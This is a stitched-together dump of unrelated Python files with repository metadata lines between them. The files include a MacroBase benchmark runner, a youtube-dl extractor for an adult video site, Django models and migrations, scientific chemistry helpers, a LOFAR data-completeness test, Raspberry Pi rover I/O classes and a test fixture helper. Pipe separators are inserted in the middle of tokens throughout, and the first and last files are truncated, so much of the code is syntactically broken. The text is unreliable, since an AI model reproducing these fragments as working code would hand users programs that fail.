tuples_per_second_no_itemset_mining = 0.0
itemsets = list()
with open(results_file, 'r') as f:
lines = f.read().split('\n')
for i in xrange(len(lines)):
line = lines[i]
if line.startswith("DEBUG"):
if "time" in line and "...ended" in line:
line = line.split("...ended")[1].strip()
line_tokens = line.split("(")
time_type = line_tokens[0].strip()
time = int(line_tokens[1][6:-4])
times[time_type] = time
elif "itemsets" in line:
line = lin | e.split("Number of itemsets:")[1].strip()
num_itemsets = int(line | )
elif "iterations" in line:
line = line.split(
"Number of iterations in MCD step:")[1].strip()
num_iterations = int(line)
elif "Tuples / second w/o itemset mining" in line:
line = line.split("Tuples / second w/o itemset mining = ")[1]
tuples_per_second_no_itemset_mining = float(
line.split("tuples / second")[0].strip())
elif "Tuples / second" in line:
line = line.split("Tuples / second = ")[1]
tuples_per_second = float(
line.split("tuples / second")[0].strip())
if "Columns" in line:
j = i + 1
itemset = dict()
while lines[j].strip() != '':
itemset_str = lines[j].lstrip()
[itemset_type, itemset_value] = itemset_str.split(": ")
if itemset_type != "" and itemset_value != "":
itemset[itemset_type] = itemset_value
j += 1
if itemset != {}:
itemsets.append(itemset)
return (times, num_itemsets, num_iterations, itemsets, tuples_per_second,
tuples_per_second_no_itemset_mining)
def separate_contextual_results(results_file):
contextual_results_file = results_file + "_contextual"
g = open(contextual_results_file,'w')
with open(results_file, 'r') as f:
lines = f.read().split('\n')
for i in xrange(len(lines)):
line = lines[i]
if 'macrobase.analysis.BatchAnalyzer' in line or 'macrobase.analysis.contextualoutlier' in line:
g.write(line + '\n')
g.close()
def get_stats(value_list):
value_list = [float(value) for value in value_list]
mean = sum(value_list) / len(value_list)
stddev = (sum([(value - mean)**2 for value in value_list]) /
len(value_list)) ** 0.5
return mean, stddev
def run_workload(config_parameters, number_of_runs, print_itemsets=True):
sub_dir = os.path.join(os.getcwd(),
testing_dir,
config_parameters["macrobase.query.name"],
strftime("%m-%d-%H:%M:%S"))
os.system("mkdir -p %s" % sub_dir)
# For now, we only run metrics with MCD and MAD: MCD for
# dimensionalities greater than 1, MAD otherwise.
dim = (len(config_parameters["macrobase.loader.targetHighMetrics"]) +
len(config_parameters["macrobase.loader.targetLowMetrics"]))
if dim > 1:
config_parameters["macrobase.analysis.detectorType"] = "MCD"
else:
config_parameters["macrobase.analysis.detectorType"] = "MAD"
process_config_parameters(config_parameters)
conf_file = "batch.conf" if config_parameters["isBatchJob"] \
else "streaming.conf"
conf_file = os.path.join(sub_dir, conf_file)
#create
config_parameters["macrobase.analysis.contextual.outputFile"] = os.path.join(sub_dir, "output.txt")
create_config_file(config_parameters, conf_file)
cmd = "pipeline" if config_parameters["isBatchJob"] else "streaming"
all_times = dict()
all_num_itemsets = list()
all_num_iterations = list()
all_itemsets = set()
all_tuples_per_second = list()
all_tuples_per_second_no_itemset_mining = list()
for i in xrange(number_of_runs):
results_file = os.path.join(sub_dir, "results%d.txt" % i)
macrobase_cmd = '''java ${{JAVA_OPTS}} \\
-cp "src/main/resources/:target/classes:target/lib/*:target/dependency/*" \\
macrobase.MacroBase {cmd} {conf_file} \\
> {results_file} 2>&1'''.format(
cmd=cmd, conf_file=conf_file, results_file=results_file)
print 'running the following command:'
print macrobase_cmd
os.system("cd ..; cd ..; %s" % macrobase_cmd)
separate_contextual_results(results_file)
#for inspecting contextual outlier performance
(times, num_itemsets, num_iterations, itemsets,
tuples_per_second, tuples_per_second_no_itemset_mining) = parse_results(results_file)
for time_type in times:
if time_type not in all_times:
all_times[time_type] = list()
all_times[time_type].append(times[time_type])
all_num_itemsets.append(num_itemsets)
all_num_iterations.append(num_iterations)
for itemset in itemsets:
all_itemsets.add(frozenset(itemset.items()))
all_tuples_per_second.append(tuples_per_second)
all_tuples_per_second_no_itemset_mining.append(tuples_per_second_no_itemset_mining)
mean_and_stddev_times = dict()
for time_type in all_times:
mean_and_stddev_times[time_type] = get_stats(all_times[time_type])
mean_num_itemsets, stddev_num_itemsets = get_stats(all_num_itemsets)
mean_num_iterations, stddev_num_iterations = get_stats(all_num_iterations)
mean_tuples_per_second, stddev_tuples_per_second = \
get_stats(all_tuples_per_second)
mean_tps_no_itemset_mining, stddev_tps_no_item |
marxin/youtube-dl | youtube_dl/extractor/tnaflix.py | Python | unlicense | 2,854 | 0.002803 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
parse_duration,
fix_xml_ampersands,
)
class TNAFlixIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?tnaflix\.com/(?P<cat_id>[\w-]+)/(?P<display_id>[\w-]+)/video(?P<id>\d+)'
_TITLE_REGEX = r'<title>(.+?) - TNAFlix Porn Videos</title>'
_DESCRIPTION_REGEX = r'<h3 itemprop="description">([^<]+)</h3>'
_CONFIG_REGEX = r'flashvars\.config\s*=\s*escape\("([^"]+)"'
_TEST = {
'url': 'http://www.tnaflix.com/porn-stars/Carmella-Decesare-striptease/video553878',
'md5': 'ecf3498417d09216374fc5907f9c6ec0',
'info_dict': {
'id': '553878',
'display_id': 'Carmella-Decesare-striptease',
'ext': 'mp4',
'title': 'Carmella Decesare - striptease',
'description': '',
'thumbnail': 're:https?://.*\.jpg$',
'duration': 91,
'age_limit': 18,
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
display_id = mobj.group('display_id')
webpage = self._download_webpage(url, display_id)
title = self._html_search_regex(
self._TITLE_REGEX, webpage, 'title') if self._TITLE_REGEX else self._og_search_title(webpage)
description = self._html_search_regex(
self._DESCRIPTION_REGEX, webpage, 'description', fatal=False, default='')
age_limit = self._rta_search(webpage)
duration = self._html_search_meta('duration', webpage, 'duration', default=None)
if duration:
duration = parse_duration(duration[1:])
cfg_url = self._prot | o_relative_url(self._html_search_regex(
self._CONFIG_REGEX, webpage, 'flashvars.config'), 'http:')
| cfg_xml = self._download_xml(
cfg_url, display_id, note='Downloading metadata',
transform_source=fix_xml_ampersands)
thumbnail = cfg_xml.find('./startThumb').text
formats = []
for item in cfg_xml.findall('./quality/item'):
video_url = re.sub('speed=\d+', 'speed=', item.find('videoLink').text)
format_id = item.find('res').text
fmt = {
'url': video_url,
'format_id': format_id,
}
m = re.search(r'^(\d+)', format_id)
if m:
fmt['height'] = int(m.group(1))
formats.append(fmt)
self._sort_formats(formats)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'age_limit': age_limit,
'formats': formats,
}
|
mishbahr/djangocms-twitter2 | djangocms_twitter/migrations/0001_initial.py | Python | bsd-3-clause | 2,646 | 0.003779 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import connected_accounts.fields
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('connected_accounts', '0001_initial'),
('cms', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Twitter',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('screen_name', models.CharField(help_text='You may create an embedded timeline for any public Twitter user. By default, the "Connected Account" tweets are fetched.', max_length=100, null=True, verbose_name='Twitter Username', blank=True)),
('search_query', models.CharField(help_text='You may create a search timeline for any query or #hashtag..', max_length=255, verbose_name='Search Query', blank=True)),
('no_of_items', models.IntegerField(default=20, help_text='Select the number of items this block should display (max 20)', verbose_name='Items to Display', validators=[django.core.validators.MaxValueValidator(20), django.core.validators.MinValueValidator(1)])),
('timeline_source', models.CharField(default='user', help_text="You can em | bed a timeline for Tweets from an individual user, a u | ser's favorites or any search query or hashtag.", max_length=50, verbose_name='Available Timelines', choices=[('user', 'User Timeline'), ('favorites', 'Favorites'), ('search', 'Search Query')])),
('show_avatar', models.BooleanField(default=True, help_text='Shows or hides the avatar image.', verbose_name='Show Avatar?')),
('show_username', models.BooleanField(default=True, help_text='Shows or hides the username text.', verbose_name='Show Username?')),
('follow_button', models.BooleanField(default=True, help_text='Append a follow button to the listing.', verbose_name='Show Follow Button?')),
('plugin_template', models.CharField(default=b'djangocms_twitter/default.html', max_length=150, verbose_name='Design', choices=[(b'djangocms_twitter/default.html', 'Default')])),
('account', connected_accounts.fields.AccountField(verbose_name='Connected Account', to='connected_accounts.Account', provider='twitter', help_text='Select a connected Twitter account or connect to a new account.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
|
datagutten/comics | comics/core/models.py | Python | agpl-3.0 | 4,089 | 0 | import datetime
import os
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from django.core.urlresolvers import reverse
from django.db import models
from django.utils import timezone
from comics.core.managers import ComicManager
class Comic(models.Model):
LANGUAGES = (
('en', 'English'),
('no', 'Norwegian'),
)
# Required fields
name = models.CharField(
max_length=100,
help_text='Name of the comic')
slug = models.SlugField(
max_length=100, unique=True,
verbose_name='Short name',
help_text='For file paths and URLs')
language = models.CharField(
max_length=2, choices=LANGUAGES,
help_text='The language of the comic')
# Optional fields
url = models.URLField(
verbose_name='URL', blank=True,
help_text='URL to the official website')
active = models.BooleanField(
default=True,
help_text='Wheter the comic is still being crawled')
start_date = models.DateField(
blank=True, null=True,
help_text='First published at')
end_date = models.DateField(
blank=True, null=True,
help_text='Last published at, if comic has been cancelled')
rights = models.CharField(
max_length=100, blank=True,
help_text='Author, copyright, and/or licensing information')
# Automatically populated fields
added = models.DateTimeField(
auto_now_add=True,
help_text='Time the comic was added to the site')
objects = ComicManager()
class Meta:
db_table = 'comics_comic'
ordering = ['name']
def __unicode__(self):
return self.slug
def get_absolute_url(self):
return reverse('comic_latest', kwargs={'comic_slug': self.slug})
def get_redirect_url(self):
return reverse('comic_website', kwargs={'comic_slug': self.slug})
def is_new(self):
some_time_ago = timezone.now() - datetime.timedelta(
days=settings.COMICS_NUM_DAYS_COMIC_IS_NEW)
return self.added > some_time_ago
class Release(models.Model):
# Required fields
comic = models.ForeignKey(Comic)
pub_date = models.DateField(verbose_name='publication date', db_index=True)
images = models.ManyToManyField('Image', related_name='releases')
# Automatically populated fields
fetched = models.DateTimeField(auto_now_add=True, db_index=True)
class Meta:
db_table = 'comics_release'
get_latest_by = 'pub_date'
def __unicode__(self):
return u'Release %s/%s' % (self.comic.slug, self.pub_date)
def get_absolute_url(self):
return reverse('comic_day', kwargs={
'comic_slug': se | lf.comic.slug,
'year': self.pub_date.year,
'month': se | lf.pub_date.month,
'day': self.pub_date.day,
})
def get_ordered_images(self):
if not getattr(self, '_ordered_images', []):
self._ordered_images = list(self.images.order_by('id'))
return self._ordered_images
# Let all created dirs and files be writable by the group
os.umask(0002)
image_storage = FileSystemStorage(
location=settings.MEDIA_ROOT, base_url=settings.MEDIA_URL)
def image_file_path(instance, filename):
return u'%s/%s/%s' % (instance.comic.slug, filename[0], filename)
class Image(models.Model):
# Required fields
comic = models.ForeignKey(Comic)
file = models.ImageField(
storage=image_storage, upload_to=image_file_path,
height_field='height', width_field='width')
checksum = models.CharField(max_length=64, db_index=True)
# Optional fields
title = models.CharField(max_length=255, blank=True)
text = models.TextField(blank=True)
# Automatically populated fields
fetched = models.DateTimeField(auto_now_add=True)
height = models.IntegerField()
width = models.IntegerField()
class Meta:
db_table = 'comics_image'
def __unicode__(self):
return u'Image %s/%s...' % (self.comic.slug, self.checksum[:8])
|
npinto/Oger | Oger/gradient/__init__.py | Python | gpl-3.0 | 1,376 | 0.003634 | """
This subpackage contains nodes and trainers for gradient based learning.
Its purpose is to automate backpropagation and gradient calculation for models
that can be trained using gradient methods. This allows complex architectures
to be trained using external optimizers that can use gradient and loss
information.
The main building block is the BackpropNode that takes a flow of nodes that are
supported by the gradient extension and uses a trainer object to optimize the
parameters of the nodes in the flow.
Some of the nodes that | are currently supported are the PerceptronNode and the
ERBMNode. Examples of optimization algorithms that have been wrapped into
trainer objects are gradient descent, RPROP, conjugate gradient and BFGS.
The 'models' package contains some pre-defined architectures that use the
gradient package for training.
"""
from gradient_nodes import (GradientExtensionNode, BackpropNode, GradientPerceptronNode, GradientRBMNode)
from trainers import (CGTrainer, BFGSTrainer, RPROPTrainer, Gradi | entDescentTrainer, LBFGSBTrainer)
from models import (MLPNode, AutoencoderNode)
del gradient_nodes
del trainers
del models
__all__ = ['GradientExtensionNode', 'BackpropNode', 'GradientPerceptronNode', 'GradientRBMNode',
'CGTrainer', 'BFGSTrainer', 'RPROPTrainer', 'GradientDescentTrainer', 'LBFGSBTrainer', 'MLPNode,', 'AutoencoderNode']
|
geodynamics/burnman | burnman/tools/chemistry.py | Python | gpl-2.0 | 8,056 | 0.000372 | # This file is part of BurnMan - a thermoelastic and thermodynamic toolkit
# for the Earth and Planetary Sciences
# Copyright (C) 2012 - 2021 by the BurnMan team, released under the GNU
# GPL v2 or later.
# This module provides higher level chemistry-related functions.
from __future__ import absolute_import
import numpy as np
from scipy.optimize import fsolve
from .. import constants
# Import common lower level functions for backwards compatibility
from ..utils.chemistry import dictionarize_formula, formula_mass
from ..utils.chemistry import formula_to_string, site_occupancies_to_strings
def fugacity(standard_material, assemblage):
"""
Parameters
----------
standard_material: burnman.Material object
set_method and set_state should already have been used
material must have a formula as a dictionary parameter
assemblage: burnman.Composite object
set_method and set_state should already have been used
Returns
-------
fugacity : float
Value of the fugacity of the component with respect to
the standard material
"""
component_formula = standard_material.params['formula']
chemical_potential = assemblage.chemical_potential([component_formula])[0]
fugacity = np.exp((chemical_potential - standard_material.gibbs)
/ (constants.gas_constant * assemblage.temperature))
return fugacity
def relative_fugacity(compo | nent_formula, assemblage, reference_assemblage):
"""
Parameters
----------
component_formula: dictionary
Chemical formula for which to compute the relative fugacity.
assemblage: burnman.Composite object
se | t_method and set_state should already have been used.
reference_assemblage: burnman.Composite object
set_method and set_state should already have been used.
Returns
-------
relative_fugacity : float
Value of the fugacity of the component in the assemblage
with respect to the reference_assemblage.
"""
chemical_potential = assemblage.chemical_potential([component_formula])[0]
reference_chemical_potential = reference_assemblage.chemical_potential([component_formula])[0]
relative_fugacity = np.exp((chemical_potential
- reference_chemical_potential)
/ (constants.gas_constant
* assemblage.temperature))
return relative_fugacity
def equilibrium_pressure(minerals, stoichiometry, temperature,
pressure_initial_guess=1.e5):
"""
Given a list of minerals, their reaction stoichiometries
and a temperature of interest, compute the
equilibrium pressure of the reaction.
Parameters
----------
minerals : list of minerals
List of minerals involved in the reaction.
stoichiometry : list of floats
Reaction stoichiometry for the minerals provided.
Reactants and products should have the opposite signs [mol]
temperature : float
Temperature of interest [K]
pressure_initial_guess : optional float
Initial pressure guess [Pa]
Returns
-------
pressure : float
The equilibrium pressure of the reaction [Pa]
"""
def eqm(P, T):
gibbs = 0.
for i, mineral in enumerate(minerals):
mineral.set_state(P[0], T)
gibbs = gibbs + mineral.gibbs * stoichiometry[i]
return gibbs
pressure = fsolve(eqm, [pressure_initial_guess], args=(temperature))[0]
return pressure
def equilibrium_temperature(minerals, stoichiometry, pressure, temperature_initial_guess=1000.):
"""
Given a list of minerals, their reaction stoichiometries
and a pressure of interest, compute the
equilibrium temperature of the reaction.
Parameters
----------
minerals : list of minerals
List of minerals involved in the reaction.
stoichiometry : list of floats
Reaction stoichiometry for the minerals provided.
Reactants and products should have the opposite signs [mol]
pressure : float
Pressure of interest [Pa]
temperature_initial_guess : optional float
Initial temperature guess [K]
Returns
-------
temperature : float
The equilibrium temperature of the reaction [K]
"""
def eqm(T, P):
gibbs = 0.
for i, mineral in enumerate(minerals):
mineral.set_state(P, T[0])
gibbs = gibbs + mineral.gibbs * stoichiometry[i]
return gibbs
temperature = fsolve(eqm, [temperature_initial_guess], args=(pressure))[0]
return temperature
def invariant_point(minerals_r1, stoichiometry_r1,
minerals_r2, stoichiometry_r2,
pressure_temperature_initial_guess=[1.e9, 1000.]):
"""
Given a list of minerals, their reaction stoichiometries
and a pressure of interest, compute the
equilibrium temperature of the reaction.
Parameters
----------
minerals : list of minerals
List of minerals involved in the reaction.
stoichiometry : list of floats
Reaction stoichiometry for the minerals provided.
Reactants and products should have the opposite signs [mol]
pressure : float
Pressure of interest [Pa]
temperature_initial_guess : optional float
Initial temperature guess [K]
Returns
-------
temperature : float
The equilibrium temperature of the reaction [K]
"""
def eqm(PT):
P, T = PT
gibbs_r1 = 0.
for i, mineral in enumerate(minerals_r1):
mineral.set_state(P, T)
gibbs_r1 = gibbs_r1 + mineral.gibbs * stoichiometry_r1[i]
gibbs_r2 = 0.
for i, mineral in enumerate(minerals_r2):
mineral.set_state(P, T)
gibbs_r2 = gibbs_r2 + mineral.gibbs * stoichiometry_r2[i]
return [gibbs_r1, gibbs_r2]
pressure, temperature = fsolve(eqm, pressure_temperature_initial_guess)
return pressure, temperature
def hugoniot(mineral, P_ref, T_ref, pressures, reference_mineral=None):
"""
Calculates the temperatures (and volumes) along a Hugoniot
as a function of pressure according to the Hugoniot equation
U2-U1 = 0.5*(p2 - p1)(V1 - V2) where U and V are the
internal energies and volumes (mass or molar) and U = F + TS
Parameters
----------
mineral : mineral
Mineral for which the Hugoniot is to be calculated.
P_ref : float
Reference pressure [Pa]
T_ref : float
Reference temperature [K]
pressures : numpy array of floats
Set of pressures [Pa] for which the Hugoniot temperature
and volume should be calculated
reference_mineral : mineral
Mineral which is stable at the reference conditions
Provides an alternative U_0 and V_0 when the reference
mineral transforms to the mineral of interest at some
(unspecified) pressure.
Returns
-------
temperatures : numpy array of floats
The Hugoniot temperatures at pressure
volumes : numpy array of floats
The Hugoniot volumes at pressure
"""
def Ediff(T, mineral, P, P_ref, U_ref, V_ref):
mineral.set_state(P, T[0])
U = mineral.helmholtz + T[0] * mineral.S
V = mineral.V
return (U - U_ref) - 0.5 * (P - P_ref) * (V_ref - V)
if reference_mineral is None:
reference_mineral = mineral
reference_mineral.set_state(P_ref, T_ref)
U_ref = reference_mineral.helmholtz + T_ref * reference_mineral.S
V_ref = reference_mineral.V
temperatures = np.empty_like(pressures)
volumes = np.empty_like(pressures)
for i, P in enumerate(pressures):
temperatures[i] = fsolve(
Ediff, [T_ref], args=(mineral, P, P_ref, U_ref, V_ref))[0]
volumes[i] = mineral.V
return temperatures, volumes
|
brentjens/pyautoplot | test/testf0seqnrcalculation.py | Python | gpl-3.0 | 6,014 | 0.011141 | """
Example usage:
python3 testf0seqnrcalculation.py 548659 \
../testdata/sample_data_548659/L548659.parset \
../testdata/sample_data_548659/file-sizes.txt \
../testdata/sample_data_548659/f0seqnr-sizes.txt
"""
import os
import sys
sys.path.append("../scripts")
import create_html
def test_main(in_sas_i | d, in_parset_path, in_file_sizes_path, in_f0seqnr_sizes_path):
result = True
parset = create_html.parset_summary(in_sas_id, in_parset_path)
file_sizes_dict | = create_html.parse_file_sizes(in_file_sizes_path)
analysed_file_sizes_dict = create_html.file_size_analysis(parset, file_sizes_dict)
highest_file_size_mb = analysed_file_sizes_dict['max_ms_size_mb'].max()
f0seqnr_sizes_dict = create_html.parse_file_sizes(in_f0seqnr_sizes_path, os.path.dirname)
f0seqnr_completeness_dict = create_html.f0seqnr_size_analysis(parset, f0seqnr_sizes_dict)
f0seqnr_completeness_statistics = create_html.calculate_statistics(f0seqnr_completeness_dict.values(), (100.0, None))
print("Relevant parset details:")
print("clock_mhz: ", parset['clock_mhz'])
print("start-time: ", parset['start_time'])
print("stop-time: ", parset['stop_time'])
print("block_size: ", parset['block_size'])
print("nr_integrations_per_block: ", parset['nr_integrations_per_block'])
print("nr_blocks_per_integration: ", parset['nr_blocks_per_integration'])
print("nr_integration_periods: ", parset['nr_integration_periods'])
print("Correlator locations: ", "\n".join(parset['correlator_locations']))
print("Beamformer locations: ", "\n".join(parset['beamformer_locations']))
print("\nContent of [file_sizes_dict]:")
for data_product_folder, (_, _, file_size_in_mb) in file_sizes_dict.items():
print(data_product_folder, " (", file_size_in_mb, "MB)")
print("\nContent of [analysed_file_sizes_dict]:")
print("max_ms_size_mb: ", analysed_file_sizes_dict['max_ms_size_mb'])
print("max_raw_size_mb: ", analysed_file_sizes_dict['max_raw_size_mb'])
print("missing_data_sets: ", analysed_file_sizes_dict['missing_data_sets'])
print("odd_sized_data_sets: ", analysed_file_sizes_dict['odd_sized_data_sets'])
print("percentage_complete: ", analysed_file_sizes_dict['percentage_complete'])
print("\nContent of [f0seqnr_sizes_dict]:")
for data_product_folder, (_, _, nr_integration_periods_in_file) in f0seqnr_sizes_dict.items():
print(data_product_folder, " (", nr_integration_periods_in_file, ")")
print("\nContent of [f0seqnr_completeness_dict]:")
for data_product_folder, completeness_value in f0seqnr_completeness_dict.items():
print(data_product_folder, " (", completeness_value, ")")
print("\nTotal average completeness: ", f0seqnr_completeness_statistics, " over ", len(f0seqnr_completeness_dict.values()), " number of items")
print("\nIncomplete datasets according to original method (odd_sized_data_sets (=) abs(float(data_size_mb)/float(max_ms_size_mb) -1.0) > 0.01):")
for (name, size) in sorted(analysed_file_sizes_dict['odd_sized_data_sets']):
print("Dataset: ", name, " Size: ", size, "MB")
print("\nIncomplete datasets according to f0seqnr method (completeness_value < 100):")
for data_product_folder, completeness_value in f0seqnr_completeness_dict.items():
if completeness_value < 99.95:
print("Dataset: ", data_product_folder, " Completeness: %0.1f%%" % completeness_value)
print("\nIncomplete datasets based on relative (Max size = %rMB) file size:" % highest_file_size_mb)
for data_product_folder, (_, _, file_size_in_mb) in file_sizes_dict.items():
if file_size_in_mb < highest_file_size_mb:
print("Dataset: ", data_product_folder, " Size: ", file_size_in_mb, "MB ", "(%0.f%%)" % (100*file_size_in_mb/highest_file_size_mb))
print('\n'.join(['%s: %dMB (%0.f%%)' % (name, size, f0seqnr_completeness_dict.get(name, -1)) for (name, size) in sorted(analysed_file_sizes_dict['odd_sized_data_sets'])]))
open("./index.html", 'w').write('''
<html>
<head>
<meta http-equiv="refresh" content="60">
<title>LOFAR Inspection plots</title>
</head>
<body>
<h1>LOFAR inspection plots</h1>
<table>
<tr><th>SAS ID</th> <th>Campaign</th> <th>Target</th> <th>DynSpec</th> <th title="Percentage of odd sized data products per project\n\nWhere 'odd sized' is defined as:\nData products with less than %0.2f%% completeness">Compl</th> <th title="Average completeness percentage of odd sized data products (based on f0seqnr sizes)\n\nWhere 'odd sized' is defined as:\nData products with less than %0.2f%% completeness">Compl*</th> <th>AntennaSet</th> <th>Band</th> <th>Start</th> <th>End</th> <th>Clock</th> <th>Subb</th> <th>Parset</th></tr>
%s
</table>
</body>
</html>
''' % (100*(1-create_html.DATA_INCOMPLETE_THRESHOLD),
100*(1-create_html.DATA_INCOMPLETE_THRESHOLD),
create_html.observation_table_row(parset, analysed_file_sizes_dict, f0seqnr_completeness_dict, "./")))
return result
def parse_arguments(argv):
sas_id = int(argv[1])
parset_path = argv[2]
file_sizes_path = argv[3]
f0seqnr_sizes_file_path = argv[4]
return sas_id, parset_path, file_sizes_path, f0seqnr_sizes_file_path
if __name__ == '__main__':
print("Called as: %s\n" % (" ".join(sys.argv)))
if len(sys.argv) == 5:
sas_id, parset_path, file_sizes_path, f0seqnr_sizes_file_path = parse_arguments(sys.argv)
if test_main(sas_id, parset_path, file_sizes_path, f0seqnr_sizes_file_path):
print("Test successful")
else:
print("Test unsuccessful")
else:
print ("Usage:\ntestf0seqnrcalculation [SAS ID] [parset file_path] [file_sizes_path] [f0seqnr_sizes_file_path]")
|
stevens4/rover3 | lowLevelLibrary.py | Python | gpl-2.0 | 9,709 | 0.009888 |
from Adafruit_ADS1x15 import ADS1x15 as A2DObject
from functools import partial
# create AI channel objects
class aiChannel:
def __init__(self,confDict):
#open connection on physicalChannel
self.name = confDict['labelText']
self.i2cAddress = confDict['i2cAddress']
self.connectionType = confDict['connectionType']
self.physChan = confDict['physicalChannel']
self.gain = confDict['gainFactor']
self.rate = confDict['sampleRate']
self.LCD = None
self.mapStyle = confDict['mappingStyle']
self.mapParams = confDict['mapParams']
self.units = confDict['mappedUnits']
self.connection = A2DObject(address=self.i2cAddress)
self.readOrder = confDict['readOrder']
# gets the latest raw, measured voltage off the ADC
def getLatestVoltage(self):
if self.connectionType == 'RSE':
return self.connection.readADCSingleEnded(
channel=self.physChan,
pga=self.gain,
sps=self.rate
)
elif self.connectionType == 'diff':
return self.connection.readADCDifferential(
chP=self.physChan[0], chN=self.physChan[1],
pga=self.gain,
sps=self.rate
)
else:
print 'UNKNOWN CONNECTION TYPE SPECIFIED!!!'
return 0
# maps the raw voltage to a reading (e.g. volts -> pressure)
def _map(self,voltage):
if self.mapStyle == 'poly':
reading = self.mapParams[0]
reading += self.mapParams[1]*voltage
reading += self.mapParams[2]*voltage**2
reading += self.mapParams[3]*voltage**3
reading += self.mapParams[4]*voltage**4
elif self.mapStyle == 'exp':
reading = self.mapParams[0]*(self.mapParams[1]**voltage)
else:
reading = 0
print 'no mapping style was defined!'
return reading
# gets the latest reading off the ADC
def getLastReading(self):
newVoltage = self.getLatestVoltage()
newReading = self._map(newVoltage)
if self.LCD is not None:
self.LCD.display(newReading)
return newReading
# gets N readings and returns the average
def getNReadings(self,nSamp):
if self.connectionType == 'RSE':
self.connection.startContinuousConversion(
channel = self.physChan,
pga = self.gain,
sps = self.rate
)
total = 0.
for i in range(nSamp):
total += self.connection.getLastConversionResults()
self.connection.stopContinuousConversion()
result = self._map(total/nSamp)
return result
elif self.connectionType == 'diff':
self.connection.startContinuousDifferentialConversion(
chP=self.physChan[0], chN=self.physChan[1],
pga=self.gain,
sps=self.rate
)
total = 0.
for i in range(nSamp):
total += self.connection.getLastConversionResults()
self.connection.stopContinuousConversion()
result = self._map(total/nSamp)
return result
else:
print 'UNKNOWN CONNECTION TYPE SPECIFIED!!!'
return 0
from config import roverLogPath
import ConfigParser
import os
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM) # use pin numberings printed on cobbler
GPIO.setwarnings(False) # silence overuse warnings in case you have two DO's on same pin
# create DO channel objects
class doChannel:
def __init__(self,confDict,aiChanDict,clockFunct=None):
# read in static class variables
self.name = confDict['name']
self.physChanNum = confDict['physicalChannel']
self.labelText = confDict['labelText']
self.aiChanDict = aiChanDict
self.clockFunctio | n = clockFunct
self.currentState = False
GPIO.setup(self.physChanNum,GPIO.OUT)
initState = confDict['initState'] in ['True']
self.setState(initState)
| self.interlockState = False
initInterlockState = confDict['initInterlockState'] in ['True']
self.setInterlockState(initInterlockState)
self.interlocks = {}
self.confDict = confDict
# initialize interlock configparser object, read in
self.interlockConfigParser = ConfigParser.RawConfigParser()
self.interlockConfigFilename = os.path.join(roverLogPath, 'interlockConfigs', 'interlockConfig_'+self.name+'.txt')
self.interlockConfigParser.read(self.interlockConfigFilename)
# parse the interlocks config dicts and create each
for interlockKey in self.interlockConfigParser.sections():
thisInterlockConfDict = {}
thisInterlockConfDict['senseChan'] = self.interlockConfigParser.get(interlockKey, 'senseChan')
thisInterlockConfDict['logFun'] = self.interlockConfigParser.get(interlockKey, 'logFun')
thisInterlockConfDict['limVal'] = float(self.interlockConfigParser.get(interlockKey, 'limVal'))
thisAIChanObj = self.aiChanDict[thisInterlockConfDict['senseChan']]
thisInterlock = self.createInterlock(thisInterlockConfDict,thisAIChanObj,key=int(interlockKey))
def setState(self, newState):
GPIO.output(self.physChanNum, newState)
if self.clockFunction is not None:
self.clockFunction()
self.currentState = newState
if newState == True: stateStr = 'ON'
if newState == False: stateStr = 'OFF'
print self.name+' has been turned '+stateStr
def getState(self):
state = GPIO.input(self.physChanNum)
self.currentState = state
return state
def createInterlock(self,confDict,aiObj,key=None):
newInterlock = interlock(confDict,aiObj)
if key is None:
interlockIndex = len(self.interlocks.keys())
else:
interlockIndex = key
self.interlocks[interlockIndex] = newInterlock
def addInterlock(self,interlock):
interlockIndex = len(self.interlocks.keys())
self.interlocks[interlockIndex] = interlock
def deleteInterlock(self,interlockKey):
del self.interlocks[interlockKey]
def getInterlocks(self):
return self.interlocks
def setInterlockState(self,newState):
self.interlockState = newState
def testInterlocks(self):
if not self.interlockState: return False
for interlock in self.interlocks.values():
if interlock.testInterlock():
print 'INTERLOCK TRIPPED ON '+self.name+'!!!'
print str(interlock.aiChannelObj.name)+' was measured above setpoint of '+str(interlock.limitValue)+' at '+str(interlock.aiChannelObj.LCD.value())
return True
return False
def configUpdate(self):
for interlockKey, interlock in self.interlocks.items():
confDict = interlock.getConfDict()
interlockKey = str(interlockKey)
if interlockKey not in self.interlockConfigParser.sections():
self.interlockConfigParser.add_section(interlockKey)
self.interlockConfigParser.set(interlockKey, 'senseChan', confDict['senseChan'])
self.interlockConfigParser.set(interlockKey, 'logFun', confDict['logFun'])
self.interlockConfigParser.set(interlockKey, 'limVal', str(confDict['limVal']))
configSectionList = self.interlockConfigParser.sections()
for configSection in configSectionList:
if int(configSection) not in self.interlocks.keys():
self.interlockConfigParser.remove_section(configSection)
with open(self.interlockConfigFilename, 'wb') as configfile:
self.interlockConfigParser.write(configfile)
# create interlock object
# up |
anchore/anchore-engine | tests/functional/clients/standalone/package_list/__init__.py | Python | apache-2.0 | 1,723 | 0.001741 | import pytest
#
# Preloaded fixtures, with pytest.param that allows a nicer repr when the test runs, instead of the
# default which slaps the whole (giant) dictionary, making output unreadable.
#
def package_path(path):
"""
Produce a recognizable path name for a package. For the input of:
/usr/lib/node_modules/npm/node_modules/has/package.json
Instead of getting just the last part (which would be `package.json` for almost every
JS package) it would be: `has/package.json`
"""
parts = path.split("/")
return "/".join(parts[-2:])
def path_params(pkgs):
"""
A helper to produce a list of tuples with better output when Pytest runs.
By default, Pytest will use the full value of the string, which in the case
of these fixtures is too long, causing unreadable output.
"""
return [pytest.param(path, id=package_path(path)) for path, _ in pkgs.items()]
def metadata_params(pkgs, fields=None):
"""
Similarly to `path_params`, the idea is to produce readable output when
running pytest by using `pytest.param` and reduced string representation
from the values passed in.
"""
if fields:
params | = []
for field in fields | :
params += [
pytest.param(
path,
metadata,
field,
id="field={} element={}".format(
